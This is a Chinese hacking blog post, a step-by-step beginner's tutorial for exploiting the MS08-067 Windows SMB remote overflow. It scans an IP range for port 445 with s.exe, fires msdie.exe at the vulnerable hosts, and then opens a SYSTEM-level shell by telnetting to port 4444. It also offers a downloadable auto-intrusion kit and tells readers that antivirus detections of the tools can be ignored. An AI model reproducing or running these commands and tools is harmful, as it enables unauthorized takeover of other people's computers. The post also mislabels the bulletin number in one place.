最严重漏洞(远程溢出MS08067)利用(扫描+入侵)

分类:技术交流 → 12:41 | 评论(0) | 阅读(1501) 设置文字大小 → | |
漏洞编号MS08064
补丁编号KB958644
说明:知道IP,可以进行远程溢出,得到CMDSHELL,获取SYSTEM权限

我自己扫描了一下几乎10台电脑里就有一台电脑有这个漏洞
溢出和扫描的过程也挺简单的
看教程

先通过S.EXE进行扫描,格式是     s.exe -b 起始IP地址 -e 终止IP地址 -o hhumor.txt
扫描结束后,查看S.EXE目录下的hhumor.txt文件,从里面找到有漏洞的电脑

如下结果=======================================================================

[ Scanning port 445 from 10.10.11.0 -> 10.10.11.225 ... ... ]
10.10.11.30
10.10.11.42

http://www.microsoft.com/technet ... 08-067.mspx?pf=true
http://www.microsoft.com/china/t ... 08-067.mspx?pf=true
http://support.microsoft.com/kb/958644
http://support.microsoft.com/kb/958644/zh_cn

===============================================================================

可以知道10.10.11.30和10.10.11.42有这个漏洞

下面开始溢出:使用msdie.exe

命令格式msdie.exe 有漏洞的IP

如:  msdie.exe 10.10.11.30

溢出成功如下图
点击在新窗口中浏览此图片

接下来就是溢出后的入侵

被溢出的电脑的4444端口会被打开,初学者就用telnet连接

格式如下
telnet 被入侵的电脑的IP 4444

如:
telnet 10.10.11.30 4444    连接成功后如下图
点击在新窗口中浏览此图片

接下来  看你的了
SYSTEM权限的CMDSHELL够你用的了
给初学者说一下SYSTEM权限,知道电脑管理员吧!SYSTEM的权限就是比管理员更高权限的用户

把工具包里面的菜鸟专用自动入侵.bat和S.EXE  MSDIE.EXE放到同一目录下,最后打开菜鸟专用自动入侵.bat

本地下载自动溢出工具包
(注意黑客工具会被杀毒软件当成病毒杀掉,此工具没有捆绑木马或病毒,可以放心使用)

出处:Hhumor
转载时必须以链接形式注明出处及本声明!
Tags: , , , ,
评论
发表评论
表情
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
打开HTML
打开UBB
打开表情
隐藏
记住我
 昵称  
 网址
 电邮